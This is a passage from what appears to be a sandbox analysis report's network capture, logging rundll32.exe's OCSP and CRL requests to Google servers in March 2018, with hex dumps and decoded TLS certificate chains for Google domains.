00 69 c0 97 5a 00 03 0d 0a 36 61 0d 0a 1c cd c1 0d 80 20 0c 40 d1 55 88 03 d0 bb a9 ec e1 11 a4 02 09 58 d3 42 88 db 6b 4c fe f9 7d cc bd 55 87 81 e3 e3 76 1e c6 0b 99 40 e5 4a 06 bd c9 42 e7 b6 e4 de 6f 5d 01 e6 9c 36 55 0e be 2a 9f fa b4 9b b5 8c 66 59 12 0c fd 5a 9c 50 2c 42 47 a7 88 e0 9d 45 f8 59 84 ff f1 02 00 00 ff ff 03 00 a6 cd 4f b1 6a 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aiZ6a @UXBkL}Uv@JBo]6U*fYZP,BGEYOj0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.2	49183	172.217.3.174	80	C:\Windows\System32\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Mar 1, 2018 09:57:53.121984959 CET	408	OUT	GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCAbAYYM2%2B27i HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: clients1.google.com
Mar 1, 2018 09:57:56.564547062 CET	417	IN	HTTP/1.1 200 OK Content-Type: application/ocsp-response Date: Wed, 28 Feb 2018 14:34:38 GMT Server: ocsp_responder Content-Length: 463 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Cache-Control: public, max-age=345600 Age: 66197 Data Raw: 30 82 01 cb 0a 01 00 a0 82 01 c4 30 82 01 c0 06 09 2b 06 01 05 05 07 30 01 01 04 82 01 b1 30 82 01 ad 30 81 96 a2 16 04 14 4a dd 06 16 1b bc f6 68 b5 76 f5 81 b6 bb 62 1a ba 5a 81 2f 18 0f 32 30 31 38 30 32 32 38 30 37 32 38 34 33 5a 30 6b 30 69 30 41 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 f2 e0 6a f9 85 8a 1d 8d 70 9b 49 19 23 7a a9 b5 1a 28 7e 64 04 14 4a dd 06 16 1b bc f6 68 b5 76 f5 81 b6 bb 62 1a ba 5a 81 2f 02 08 06 c0 61 83 36 fb 6e e2 80 00 18 0f 32 30 31 38 30 32 32 38 30 37 32 38 34 33 5a a0 11 18 0f 32 30 31 38 30 33 30 37 30 37 32 38 34 33 5a 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 06 51 68 16 fc fd f1 7b 53 c3 4d 47 d1 ea de 91 bb 37 ea aa 11 b3 24 2a 64 7a 32 79 78 1e 9d 0b 61 db a1 70 4f 6d 37 e9 de f3 de 30 00 61 e7 8c de 14 25 b1 92 d1 7c 8f 68 61 27 d3 67 1f 26 d3 74 4e f5 d3 ab 6b 6a 39 95 c1 a1 79 2c cb 27 7c d3 c5 f1 eb 8f cb 4c 8a d7 ab 05 e7 87 a1 1b c1 e8 58 67 f0 e4 74 34 26 be fd fc e7 4e 37 30 0f 34 e3 83 df 2a 1b 7b 3c b5 4f bd ff 0b ad 3b 52 5a b7 1b 79 68 bb bb c1 ec 7e 9f ba 39 04 02 c5 ed 88 b0 8b a3 2a 54 43 d8 11 96 db 24 d0 bc 78 2d c9 92 d3 f4 46 ec e6 3d 60 f8 8a 0f f0 ca fd 14 4f 17 44 dd 60 d5 f7 0f 66 f4 13 32 39 cc 40 7e da 6e aa 63 b0 ad 13 91 6b 51 ca b2 89 83 b3 5e e8 11 35 6e 4a 90 a2 89 d5 22 3b 10 bf 50 29 35 78 83 4d 97 3c f9 4d f2 fb f9 27 44 11 63 b2 c7 e9 b4 ab d7 86 74 77 d9 2e b7 0e 94 6d 51 21 Data Ascii: 00+000JhvbZ/20180228072843Z0k0i0A0+jpI#z(~dJhvbZ/a6n20180228072843Z20180307072843Z0HQh{SMG7$dz2yxapOm70a%\|ha'g&tNkj9y,'\|LXgt4&N704{<O;RZyh~9TC$x-F=`OD`f29@~nckQ^5nJ";P)5xM<M'Dctw.mQ!
Mar 1, 2018 09:57:56.764132977 CET	419	IN	HTTP/1.1 200 OK Content-Type: application/ocsp-response Date: Wed, 28 Feb 2018 14:34:38 GMT Server: ocsp_responder Content-Length: 463 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Cache-Control: public, max-age=345600 Age: 66197 Data Raw: 30 82 01 cb 0a 01 00 a0 82 01 c4 30 82 01 c0 06 09 2b 06 01 05 05 07 30 01 01 04 82 01 b1 30 82 01 ad 30 81 96 a2 16 04 14 4a dd 06 16 1b bc f6 68 b5 76 f5 81 b6 bb 62 1a ba 5a 81 2f 18 0f 32 30 31 38 30 32 32 38 30 37 32 38 34 33 5a 30 6b 30 69 30 41 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 f2 e0 6a f9 85 8a 1d 8d 70 9b 49 19 23 7a a9 b5 1a 28 7e 64 04 14 4a dd 06 16 1b bc f6 68 b5 76 f5 81 b6 bb 62 1a ba 5a 81 2f 02 08 06 c0 61 83 36 fb 6e e2 80 00 18 0f 32 30 31 38 30 32 32 38 30 37 32 38 34 33 5a a0 11 18 0f 32 30 31 38 30 33 30 37 30 37 32 38 34 33 5a 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 06 51 68 16 fc fd f1 7b 53 c3 4d 47 d1 ea de 91 bb 37 ea aa 11 b3 24 2a 64 7a 32 79 78 1e 9d 0b 61 db a1 70 4f 6d 37 e9 de f3 de 30 00 61 e7 8c de 14 25 b1 92 d1 7c 8f 68 61 27 d3 67 1f 26 d3 74 4e f5 d3 ab 6b 6a 39 95 c1 a1 79 2c cb 27 7c d3 c5 f1 eb 8f cb 4c 8a d7 ab 05 e7 87 a1 1b c1 e8 58 67 f0 e4 74 34 26 be fd fc e7 4e 37 30 0f 34 e3 83 df 2a 1b 7b 3c b5 4f bd ff 0b ad 3b 52 5a b7 1b 79 68 bb bb c1 ec 7e 9f ba 39 04 02 c5 ed 88 b0 8b a3 2a 54 43 d8 11 96 db 24 d0 bc 78 2d c9 92 d3 f4 46 ec e6 3d 60 f8 8a 0f f0 ca fd 14 4f 17 44 dd 60 d5 f7 0f 66 f4 13 32 39 cc 40 7e da 6e aa 63 b0 ad 13 91 6b 51 ca b2 89 83 b3 5e e8 11 35 6e 4a 90 a2 89 d5 22 3b 10 bf 50 29 35 78 83 4d 97 3c f9 4d f2 fb f9 27 44 11 63 b2 c7 e9 b4 ab d7 86 74 77 d9 2e b7 0e 94 6d 51 21 Data Ascii: 00+000JhvbZ/20180228072843Z0k0i0A0+jpI#z(~dJhvbZ/a6n20180228072843Z20180307072843Z0HQh{SMG7$dz2yxapOm70a%\|ha'g&tNkj9y,'\|LXgt4&N704{<O;RZyh~9TC$x-F=`OD`f29@~nckQ^5nJ";P)5xM<M'Dctw.mQ!

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.2	49184	172.217.3.174	80	C:\Windows\System32\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Mar 1, 2018 09:57:53.509593964 CET	409	OUT	GET /GIAG2.crl HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: pki.google.com
Mar 1, 2018 09:57:56.692864895 CET	418	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: application/pkix-crl Content-Length: 596 Date: Thu, 01 Mar 2018 08:12:46 GMT Expires: Thu, 01 Mar 2018 09:12:46 GMT Last-Modified: Thu, 01 Mar 2018 02:15:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=3600 Age: 2709 Data Raw: 30 82 02 50 30 82 01 38 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 49 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 0a 13 0a 47 6f 6f 67 6c 65 20 49 6e 63 31 25 30 23 06 03 55 04 03 13 1c 47 6f 6f 67 6c 65 20 49 6e 74 65 72 6e 65 74 20 41 75 74 68 6f 72 69 74 79 20 47 32 17 0d 31 38 30 33 30 31 30 31 30 30 30 33 5a 17 0d 31 38 30 33 31 31 30 31 30 30 30 33 5a 30 81 88 30 19 02 08 23 5d f8 c7 4a 70 53 10 17 0d 31 37 30 38 31 30 30 39 35 31 30 38 5a 30 19 02 08 1d ba 09 02 0d a3 d1 da 17 0d 31 37 30 38 31 30 30 39 35 31 33 36 5a 30 27 02 08 01 7e b0 32 09 7c 59 c4 17 0d 31 37 30 37 32 34 30 38 33 37 35 31 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 27 02 08 78 02 d1 e5 e6 d6 0a 52 17 0d 31 37 31 31 30 37 32 32 31 36 33 38 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 03 a0 30 30 2e 30 1f 06 03 55 1d 23 04 18 30 16 80 14 4a dd 06 16 1b bc f6 68 b5 76 f5 81 b6 bb 62 1a ba 5a 81 2f 30 0b 06 03 55 1d 14 04 04 02 02 07 2f 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 06 6e 4e 8c 3f cb a4 8f 42 59 c2 bb b1 12 af 44 f6 52 91 2b 78 39 a3 f3 f8 b7 67 25 99 45 7a d3 47 a9 db a4 79 bb 69 10 c4 0c c2 57 a8 2d 06 73 64 30 36 3f 63 3e 63 28 ae 7f f9 32 33 71 b7 c5 7c 5a 34 d9 19 94 b5 97 1e f6 b7 dc f6 0d a7 17 74 bc b9 30 e7 8e 30 e8 12 0b b3 89 0b c5 16 0a 5e da c8 53 c2 9b 7b 5a 90 28 48 cf 82 b3 26 68 6f 5a ed c9 f4 aa f1 26 c3 09 26 4f 90 43 16 46 fd 78 c2 b4 6d 41 32 a3 84 8e c0 ae e0 9c 71 d2 88 18 4e 68 2f 55 4a 12 e1 68 66 01 da 32 b6 1e 82 49 2d 8c 23 a5 2a 35 75 fc 67 ff d5 e3 bb fd a5 da e4 e1 5a b0 e5 aa 58 9c 8a f9 07 d0 40 c5 e7 95 f6 13 3d c1 1a a8 b3 6e 19 1a 9e 78 5c 70 53 73 a1 53 a3 52 86 5a ab 73 57 de d3 1f 50 59 c7 3e 10 c4 61 6e 39 93 ad e2 7f 88 c9 c3 8d dc b6 6c 76 41 75 8c 54 d6 07 c5 ae 0f 4d de 02 d0 Data Ascii: 0P080H0I10UUS10UGoogle Inc1%0#UGoogle Internet Authority G2180301010003Z180311010003Z00#]JpS170810095108Z0170810095136Z0'~2\|Y170724083751Z00U0'xR171107221638Z00U00.0U#0JhvbZ/0U/0HnN?BYDR+x9g%EzGyiW-sd06?c>c(23q\|Z4t00^S{Z(H&hoZ&&OCFxmA2qNh/UJhf2I-#*5ugZX@=nx\pSsSRZsWPY>an9lvAuTM
Mar 1, 2018 09:57:56.892170906 CET	420	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: application/pkix-crl Content-Length: 596 Date: Thu, 01 Mar 2018 08:12:46 GMT Expires: Thu, 01 Mar 2018 09:12:46 GMT Last-Modified: Thu, 01 Mar 2018 02:15:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=3600 Age: 2709 Data Raw: 30 82 02 50 30 82 01 38 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 49 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 0a 13 0a 47 6f 6f 67 6c 65 20 49 6e 63 31 25 30 23 06 03 55 04 03 13 1c 47 6f 6f 67 6c 65 20 49 6e 74 65 72 6e 65 74 20 41 75 74 68 6f 72 69 74 79 20 47 32 17 0d 31 38 30 33 30 31 30 31 30 30 30 33 5a 17 0d 31 38 30 33 31 31 30 31 30 30 30 33 5a 30 81 88 30 19 02 08 23 5d f8 c7 4a 70 53 10 17 0d 31 37 30 38 31 30 30 39 35 31 30 38 5a 30 19 02 08 1d ba 09 02 0d a3 d1 da 17 0d 31 37 30 38 31 30 30 39 35 31 33 36 5a 30 27 02 08 01 7e b0 32 09 7c 59 c4 17 0d 31 37 30 37 32 34 30 38 33 37 35 31 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 27 02 08 78 02 d1 e5 e6 d6 0a 52 17 0d 31 37 31 31 30 37 32 32 31 36 33 38 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 03 a0 30 30 2e 30 1f 06 03 55 1d 23 04 18 30 16 80 14 4a dd 06 16 1b bc f6 68 b5 76 f5 81 b6 bb 62 1a ba 5a 81 2f 30 0b 06 03 55 1d 14 04 04 02 02 07 2f 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 06 6e 4e 8c 3f cb a4 8f 42 59 c2 bb b1 12 af 44 f6 52 91 2b 78 39 a3 f3 f8 b7 67 25 99 45 7a d3 47 a9 db a4 79 bb 69 10 c4 0c c2 57 a8 2d 06 73 64 30 36 3f 63 3e 63 28 ae 7f f9 32 33 71 b7 c5 7c 5a 34 d9 19 94 b5 97 1e f6 b7 dc f6 0d a7 17 74 bc b9 30 e7 8e 30 e8 12 0b b3 89 0b c5 16 0a 5e da c8 53 c2 9b 7b 5a 90 28 48 cf 82 b3 26 68 6f 5a ed c9 f4 aa f1 26 c3 09 26 4f 90 43 16 46 fd 78 c2 b4 6d 41 32 a3 84 8e c0 ae e0 9c 71 d2 88 18 4e 68 2f 55 4a 12 e1 68 66 01 da 32 b6 1e 82 49 2d 8c 23 a5 2a 35 75 fc 67 ff d5 e3 bb fd a5 da e4 e1 5a b0 e5 aa 58 9c 8a f9 07 d0 40 c5 e7 95 f6 13 3d c1 1a a8 b3 6e 19 1a 9e 78 5c 70 53 73 a1 53 a3 52 86 5a ab 73 57 de d3 1f 50 59 c7 3e 10 c4 61 6e 39 93 ad e2 7f 88 c9 c3 8d dc b6 6c 76 41 75 8c 54 d6 07 c5 ae 0f 4d de 02 d0 Data Ascii: 0P080H0I10UUS10UGoogle Inc1%0#UGoogle Internet Authority G2180301010003Z180311010003Z00#]JpS170810095108Z0170810095136Z0'~2\|Y170724083751Z00U0'xR171107221638Z00U00.0U#0JhvbZ/0U/0HnN?BYDR+x9g%EzGyiW-sd06?c>c(23q\|Z4t00^S{Z(H&hoZ&&OCFxmA2qNh/UJhf2I-#*5ugZX@=nx\pSsSRZsWPY>an9lvAuTM

HTTPS Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Subject	Issuer	Not Before	Not After	Raw
Mar 1, 2018 09:56:39.714971066 CET	443	49163	172.217.3.174	192.168.2.2	CN=*.google.com, O=Google Inc, L=Mountain View, ST=California, C=US	CN=Google Internet Authority G2, O=Google Inc, C=US	Tue Feb 13 11:44:59 CET 2018	Tue May 08 12:40:00 CEST 2018	[[ Version: V3 Subject: CN=.google.com, O=Google Inc, L=Mountain View, ST=California, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: SunPKCS11-NSS EC public key, 256 bits (id 13, session object) public x coord: 41116676421799618209132255387411135712113346617786606564587394758269250450342 public y coord: 8903066483074689096178068336359467744780947544914990778326164674500769873378 parameters: secp256r1 [NIST P-256, X9.62 prime256v1] (1.2.840.10045.3.1.7) Validity: [From: Tue Feb 13 11:44:59 CET 2018, To: Tue May 08 12:40:00 CEST 2018] Issuer: CN=Google Internet Authority G2, O=Google Inc, C=US SerialNumber: [ 06c06183 36fb6ee2]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://pki.google.com/GIAG2.crt, accessMethod: ocsp accessLocation: URIName: http://clients1.google.com/ocsp]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://pki.google.com/GIAG2.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: .google.com DNSName: .android.com DNSName: .appengine.google.com DNSName: .cloud.google.com DNSName: .db833953.google.cn DNSName: .g.co DNSName: .gcp.gvt2.com DNSName: .google-analytics.com DNSName: .google.ca DNSName: .google.cl DNSName: .google.co.in DNSName: .google.co.jp DNSName: .google.co.uk DNSName: .google.com.ar DNSName: .google.com.au DNSName: .google.com.br DNSName: .google.com.co DNSName: .google.com.mx DNSName: .google.com.tr DNSName: .google.com.vn DNSName: .google.de DNSName: .google.es DNSName: .google.fr DNSName: .google.hu DNSName: .google.it DNSName: .google.nl DNSName: .google.pl DNSName: .google.pt DNSName: .googleadapis.com DNSName: .googleapis.cn DNSName: .googlecommerce.com DNSName: .googlevideo.com DNSName: .gstatic.cn DNSName: .gstatic.com DNSName: .gvt1.com DNSName: .gvt2.com DNSName: .metric.gstatic.com DNSName: .urchin.com DNSName: .url.google.com DNSName: .youtube-nocookie.com DNSName: .youtube.com DNSName: .youtubeeducation.com DNSName: .yt.be DNSName: .ytimg.com DNSName: android.clients.google.com DNSName: android.com DNSName: developer.android.google.cn DNSName: developers.android.google.cn DNSName: g.co DNSName: goo.gl DNSName: google-analytics.com DNSName: google.com DNSName: googlecommerce.com DNSName: source.android.google.cn DNSName: urchin.com DNSName: www.goo.gl DNSName: youtu.be DNSName: youtube.com DNSName: youtubeeducation.com DNSName: yt.be][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 68 91 85 99 95 7C 21 EC BA 3C CA 79 68 77 52 82 h.....!..<.yhwR.0010: 1F A0 F7 9A ....]]] Algorithm: [SHA256withRSA] Signature:0000: 0B EC 9B A6 4E D6 80 C2 CC 2A AA 4B 3F 48 5D F2 ....N.....K?H].0010: 12 A4 4C 25 52 F4 6C 0A 0A 57 90 57 A1 00 01 05 ..L%R.l..W.W....0020: 0E A4 AA FA EA F8 7E 61 12 08 16 ED 48 15 53 FD .......a....H.S.0030: 66 05 59 80 DC DD 8F F1 4B 49 D5 CB 03 19 C6 AD f.Y.....KI......0040: 1F 6B 4A B0 C0 41 DC 02 C1 68 94 0D D1 8B F3 9D .kJ..A...h......0050: 0C D3 AC B4 C2 61 A3 A3 65 54 BA E8 F6 F9 FB F1 .....a..eT......0060: A5 6E 8E 5B CE 92 46 73 37 6A 09 56 35 30 CB 09 .n.[..Fs7j.V50..0070: E0 46 5C 8C 6D 71 0D 5B 8F AA 9B 22 02 42 09 C0 .F\.mq.[...".B..0080: 74 01 EE 28 47 30 03 B2 25 E7 39 09 01 B4 60 95 t..(G0..%.9...`.0090: 1D F4 64 65 9B DD 63 EC AE 40 36 F4 9C 7B C9 4D ..de..c..@6....M00A0: 93 A4 78 58 17 39 AC FE 69 AA BC 79 AD E5 02 24 ..xX.9..i..y...$00B0: F3 2D 6D 44 09 3B E6 1D 9F 0D 9B 28 37 2E B8 1B .-mD.;.....(7...00C0: 85 59 FE 35 A6 B7 B7 32 EF 9C B2 46 FB C6 95 9A .Y.5...2...F....00D0: F0 0F 6D BC D4 15 96 C9 5D 43 88 33 7D 6E 41 16 ..m.....]C.3.nA.00E0: 5D CA A7 06 FC 2D 66 AD 2E DB 1D E4 C9 32 F7 2C ]....-f......2.,00F0: 28 C0 04 0E BE 98 9F 19 03 1B 88 48 CA A0 02 CE (..........H....]
Mar 1, 2018 09:56:39.714971066 CET	443	49163	172.217.3.174	192.168.2.2	CN=Google Internet Authority G2, O=Google Inc, C=US	CN=GeoTrust Global CA, O=GeoTrust Inc., C=US	Mon May 22 13:32:37 CEST 2017	Tue Jan 01 00:59:59 CET 2019	[[ Version: V3 Subject: CN=Google Internet Authority G2, O=Google Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19713895149719550196537065661910573762693934593220985668782860735427060889140793885919063737778303548724916253252606564904177491762533295616984617709378739783748100146882543612565825906799282133510087546060971220666055151463898734279731009956582933624646298029265838127046200538496591314458940937082185029845612274584845875286257057247598474925565775989866310636633768255501748172403430876460228793912189332026189491067186811703150477068536877439284697584041860237489395099402658887745588613142391209024263265842301844868193180477031165936332420984796347731387363914950895491332976177715889375379088870580457661428329 public exponent: 65537 Validity: [From: Mon May 22 13:32:37 CEST 2017, To: Tue Jan 01 00:59:59 CET 2019] Issuer: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US SerialNumber: [ 01002125 88b0fa59 a777ef05 7b6627df]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://g.symcd.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://g.symcb.com/crls/gtglobal.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]]] Algorithm: [SHA256withRSA] Signature:0000: CA 49 E5 AC D7 64 64 77 5B BE 71 FA CF F4 1E 23 .I...ddw[.q....#0010: C7 9A 69 63 54 5F EB 4C D6 19 28 23 64 66 8E 1C ..icT_.L..(#df..0020: C7 87 80 64 5F 04 8B 26 AF 98 DF 0A 70 BC BC 19 ...d_..&....p...0030: 3D EE 7B 33 A9 7F BD F4 05 D4 70 BB 05 26 79 EA =..3......p..&y.0040: 9A C7 98 B9 07 19 65 34 CC 3C E9 3F C5 01 FA 6F ......e4.<.?...o0050: 0C 7E DB 7A 70 5C 4C FE 2D 00 F0 CA BE 2D 8E B4 ...zp\L.-....-..0060: A8 80 FB 01 13 88 CB 9C 3F E5 BB 77 CA 3A 67 36 ........?..w.:g60070: F3 CE D5 27 02 72 43 A0 BD 6E 02 F1 47 05 71 3E ...'.rC..n..G.q>0080: 01 59 E9 11 9E 1A F3 84 0F 80 A6 A2 78 35 2F B6 .Y..........x5/.0090: C7 A2 7F 17 7C E1 8B 56 AE EE 67 88 51 27 30 60 .......V..g.Q'0`00A0: A5 62 52 C3 37 D5 3B EA 85 2A 01 38 87 A2 CF 70 .bR.7.;..*.8...p00B0: AD A4 7A C9 C4 E7 CA C5 DA BC 23 32 F2 FE 18 C2 ..z.......#2....00C0: 7B E0 DF 3B 2F D4 D0 10 E6 96 4C FB 44 B7 21 64 ...;/.....L.D.!d00D0: 0D B9 00 94 30 12 26 87 58 98 39 05 38 0F CC 82 ....0.&.X.9.8...00E0: 48 0C 0A 47 66 EE BF B4 5F C4 FF 70 A8 E1 7F 8B H..Gf..._..p....00F0: 79 2B B8 65 32 A3 B9 B7 31 E9 0A F5 F6 1F 32 DC y+.e2...1.....2.]
Mar 1, 2018 09:56:39.714971066 CET	443	49163	172.217.3.174	192.168.2.2	CN=GeoTrust Global CA, O=GeoTrust Inc., C=US	OU=Equifax Secure Certificate Authority, O=Equifax, C=US	Tue May 21 06:00:00 CEST 2002	Tue Aug 21 06:00:00 CEST 2018	[[ Version: V3 Subject: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 2048 bits modulus: 27620593608073140957439440929253438012688864718977347268272053725994928948867769687165112265058896553974818505070806430256424431940072485024407486246475597522063246121214348496326377341879755851197260401080498544606788760407243324127929930612201002157618691487713632251700065187865963692723720912135393438861302779432180613616167225206519123176430362410262429702404863434904116727055203524505580952824336979641923534005571504410997292144760317953739063178352809680844232935574095508445145910310675421726257114605895831426222686272114090063230017292595425393719031924942422176213538487957041730136782988405751614792953 public exponent: 65537 Validity: [From: Tue May 21 06:00:00 CEST 2002, To: Tue Aug 21 06:00:00 CEST 2018] Issuer: OU=Equifax Secure Certificate Authority, O=Equifax, C=US SerialNumber: [ 12bbe6]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 48 E6 68 F9 2B D2 B2 95 D7 47 D8 23 20 10 4F 33 H.h.+....G.# .O30010: 98 90 9F D4 ....]][2]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.geotrust.com/crls/secureca.crl]]][4]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 2D 68 74 74 70 73 3A 2F 2F 77 77 77 2E 67 65 .-https://www.ge0010: 6F 74 72 75 73 74 2E 63 6F 6D 2F 72 65 73 6F 75 otrust.com/resou0020: 72 63 65 73 2F 72 65 70 6F 73 69 74 6F 72 79 rces/repository]] ]][5]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]]] Algorithm: [SHA1withRSA] Signature:0000: 76 E1 12 6E 4E 4B 16 12 86 30 06 B2 81 08 CF F0 v..nNK...0......0010: 08 C7 C7 71 7E 66 EE C2 ED D4 3B 1F FF F0 F0 C8 ...q.f....;.....0020: 4E D6 43 38 B0 B9 30 7D 18 D0 55 83 A2 6A CB 36 N.C8..0...U..j.60030: 11 9C E8 48 66 A3 6D 7F B8 13 D4 47 FE 8B 5A 5C ...Hf.m....G..Z\0040: 73 FC AE D9 1B 32 19 38 AB 97 34 14 AA 96 D2 EB s....2.8..4.....0050: A3 1C 14 08 49 B6 BB E5 91 EF 83 36 EB 1D 56 6F ....I......6..Vo0060: CA DA BC 73 63 90 E4 7F 7B 3E 22 CB 3D 07 ED 5F ...sc....>".=.._0070: 38 74 9C E3 03 50 4E A1 AF 98 EE 61 F2 84 3F 12 8t...PN....a..?.]
Mar 1, 2018 09:56:52.243504047 CET	443	49165	172.217.3.164	192.168.2.2	CN=www.google.com, O=Google Inc, L=Mountain View, ST=California, C=US	CN=Google Internet Authority G2, O=Google Inc, C=US	Tue Feb 13 11:41:32 CET 2018	Tue May 08 12:39:00 CEST 2018	[[ Version: V3 Subject: CN=www.google.com, O=Google Inc, L=Mountain View, ST=California, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: SunPKCS11-NSS EC public key, 256 bits (id 14, session object) public x coord: 47288357680263359392249055595445758949255524919392717124472036945201798648973 public y coord: 71454501640914529084048762972352541794528153385302737241353990328944487783039 parameters: secp256r1 [NIST P-256, X9.62 prime256v1] (1.2.840.10045.3.1.7) Validity: [From: Tue Feb 13 11:41:32 CET 2018, To: Tue May 08 12:39:00 CEST 2018] Issuer: CN=Google Internet Authority G2, O=Google Inc, C=US SerialNumber: [ 5008fd78 3e5e9131]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://pki.google.com/GIAG2.crt, accessMethod: ocsp accessLocation: URIName: http://clients1.google.com/ocsp]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://pki.google.com/GIAG2.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: www.google.com][9]: ObjectId: 2.5.29.14 